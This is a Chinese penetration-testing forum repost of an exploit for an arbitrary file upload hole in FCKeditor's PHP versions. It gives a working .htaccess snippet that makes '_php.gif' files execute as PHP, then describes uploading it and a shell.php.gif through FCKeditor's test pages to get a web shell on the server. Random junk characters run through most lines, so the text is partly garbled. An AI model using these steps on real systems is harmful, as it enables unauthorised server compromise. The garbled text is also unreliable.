中国网络渗透测试联盟

标题: FCKeditor所有php版本Upload上传漏洞 [打印本页]
作者: admin    时间: 2013-10-27 17:25
标题: FCKeditor所有php版本Upload上传漏洞
FCKeditor所有php版本Upload上传漏洞+ \& b9 k6 ^& Q/ M! u& b+ p# N7 J
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
; G% n; |& T# g" ?% ^4 ~3 q减小字体 增大字体6 b7 g  K/ ?1 _8 [" ^2 V* R
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability# [0 L1 [  Q! M5 i- y1 J
[+] Date: 2011: H( v1 u' Z( B$ B% d) t* S3 r
[+] Author : sinesafe.cn) v8 J, v: l1 d$ Q, D+ j* y
[+] Website : WwW.sinesafe.cn
# U  ~2 V. c6 n* x; R$ s1 L———————————————————
- E' e2 p/ \( ]& B. b1.create a htaccess file:
0 o& ~# ^8 _1 L1 ycode:
: \- q9 Y0 Q+ w8 U) d2 b. @/ L9 k<FilesMatch “_php.gif”>7 \! d$ J; Q" L% ]2 J
SetHandler application/x-httpd-php
/ [7 R" @$ x9 |# Q</FilesMatch>
- J$ |$ e# A$ G/ k5 y. x) q  @) X7 G
2.Now upload this htaccess with FCKeditor.1 M; i) {2 r1 }

: ^- x/ n" v7 `; u9 h4 ]. V3 `' K$ N' nhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html; N  n( c# L: i, t

, E2 h9 X) u! w/ k9 U! p: Ghttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html4 r/ b0 E" t# w$ L/ Z& W5 W+ N
9 n$ `- n1 i, |3 ]% g
———————————————————————————————-7 v. {0 p% C' Z+ ^$ |
3.Now upload shell.php.gif with FCKeditor.
. }# z: W4 S& b4 X& A4 G# A4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
" j' S# ^! E6 i+ Q! K! R) x# N5.http://www.sinesafe.cn/anything/shell_php.gif
' X3 \6 y0 o' P4 ^6.Now shell is available from server.

# B; j, k$ T" A& e- k- Z  R( C4 F6 t
, [( i. e1 j) n




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2